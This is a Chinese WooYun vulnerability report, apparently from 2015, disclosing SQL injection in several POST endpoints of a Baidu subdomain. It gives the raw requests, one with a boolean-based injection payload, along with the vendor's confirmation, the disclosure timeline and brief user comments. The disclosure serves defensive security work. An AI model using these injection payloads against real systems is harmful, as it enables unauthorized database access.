百度某子域多处SQL注射

编号96745
Urlhttp://www.wooyun.org/bug.php?action=view&id=96745
漏洞状态厂商已经确认
漏洞标题百度某子域多处SQL注射
漏洞类型SQL注射漏洞
厂商百度
白帽子Jannock
提交日期2015-02-11 11:06:00
公开日期2015-03-28 11:08:00
修复时间(not set)
确认时间2015-02-11 00:00:00
Confirm Spend0
漏洞标签php+字符类型注射
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank20
漏洞简介
百度某子域多处SQL注射
漏洞细节

1、
POST /report/getReportList HTTP/1.1
Host: baitong.baidu.com
app_id=135594&date_from=2015-02-02&date_to=2015-02-09'||(true and 1=1) limit 2#&type=line
date_from 和 date_to
2、POST /statistics/line HTTP/1.1
Host: baitong.baidu.com
begin=2015-02-03&end=2015-02-09&type=1
begin 和 end
3、POST /statistics/table HTTP/1.1
Host: baitong.baidu.com
sEcho=1&iColumns=4&sColumns=app_name%2Cdownload_num%2Cmoney_num%2C&iDisplayStart=0&iDisplayLength=10&mDataProp_0=app_name&mDataProp_1=download_num&mDataProp_2=money_num&mDataProp_3=3&iSortingCols=1&iSortCol_0=0&sSortDir_0=asc&bSortable_0=false&bSortable_1=true&bSortable_2=true&bSortable_3=false&begin=2015-02-03&end=2015-02-09&type=1
中多个参数
4、
POST /report/getReportDetail HTTP/1.1
Host: baitong.baidu.com
sEcho=2&iColumns=3&sColumns=adt_adv_name%2Cadt_download_num%2Cadt_actual_income&iDisplayStart=0&iDisplayLength=10&mDataProp_0=adt_adv_name&mDataProp_1=adt_download_num&mDataProp_2=adt_actual_income&iSortingCols=1&iSortCol_0=2&sSortDir_0=asc&bSortable_0=false&bSortable_1=true&bSortable_2=true&app_id=135594&date=2015-02-02'
中多个参数

POC

1.png

修复方案

过滤

状态信息 2015-02-11: 细节已通知厂商并且等待厂商处理中
2015-02-11: 厂商已经确认,细节仅向厂商公开
2015-02-21: 细节向核心白帽子及相关领域专家公开
2015-03-03: 细节向普通白帽子公开
2015-03-13: 细节向实习白帽子公开
2015-03-28: 细节向公众公开
厂商回复感谢提交,已通知业务部门处理
回应信息危害等级:高漏洞Rank:20 确认时间:2015-02-11 18:57
Showing 1-9 of 9 items.
评论内容评论人点赞数评论时间

mark

袋鼠妈妈02015-02-18 03:00:00

......多处

rasca102015-02-13 10:53:00

一哥调皮了

answer02015-02-11 11:51:00

一哥又来了

泪雨无魂02015-02-11 11:43:00

一哥又来调皮了。

老笨蛋02015-02-11 11:37:00

前排学注入

DloveJ02015-02-11 11:31:00

前排学注入

Cyrils02015-02-11 11:24:00

前排收到

陆由乙02015-02-11 11:18:00

前排

第四维度02015-02-11 11:12:00